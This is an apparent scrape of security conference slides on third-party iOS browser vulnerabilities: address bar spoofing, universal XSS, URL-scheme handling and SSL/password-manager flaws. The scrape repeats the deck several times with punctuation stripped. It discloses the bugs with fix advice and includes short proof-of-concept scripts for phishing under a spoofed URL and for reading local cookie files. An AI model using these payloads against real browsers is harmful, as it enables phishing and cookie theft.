bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
iOS Browsers
iOS Browsers
iOS Browser == Mobile Safari
bull iOS App Store Review GuidelinesbdquoApps that browse the web must use the iOS WebKit framework and WebKit Javascriptrdquo
Introduction iOS Browsers
WebView-based Proxy-rendering
iOS Third-Party Browsers
gt 60 browsers in App Store
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView API
bull loadRequest
bull loadHTMLStringbaseURL
bull loadDataMIMETypetextEncodingNamebaseURL
bull goBackgoForwardstopLoadingreload
bull request (read-only)
UIWebView amp WKWebView
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 4: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/4.jpg)
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
iOS Browsers
iOS Browsers
iOS Browser == Mobile Safari
bull iOS App Store Review GuidelinesbdquoApps that browse the web must use the iOS WebKit framework and WebKit Javascriptrdquo
Introduction iOS Browsers
WebView-based Proxy-rendering
iOS Third-Party Browsers
gt 60 browsers in App Store
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView API
bull loadRequest
bull loadHTMLStringbaseURL
bull loadDataMIMETypetextEncodingNamebaseURL
bull goBackgoForwardstopLoadingreload
bull request (read-only)
UIWebView amp WKWebView
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 5: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/5.jpg)
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
iOS Browsers
iOS Browsers
iOS Browser == Mobile Safari
bull iOS App Store Review GuidelinesbdquoApps that browse the web must use the iOS WebKit framework and WebKit Javascriptrdquo
Introduction iOS Browsers
WebView-based Proxy-rendering
iOS Third-Party Browsers
gt 60 browsers in App Store
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView API
bull loadRequest
bull loadHTMLStringbaseURL
bull loadDataMIMETypetextEncodingNamebaseURL
bull goBackgoForwardstopLoadingreload
bull request (read-only)
UIWebView amp WKWebView
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
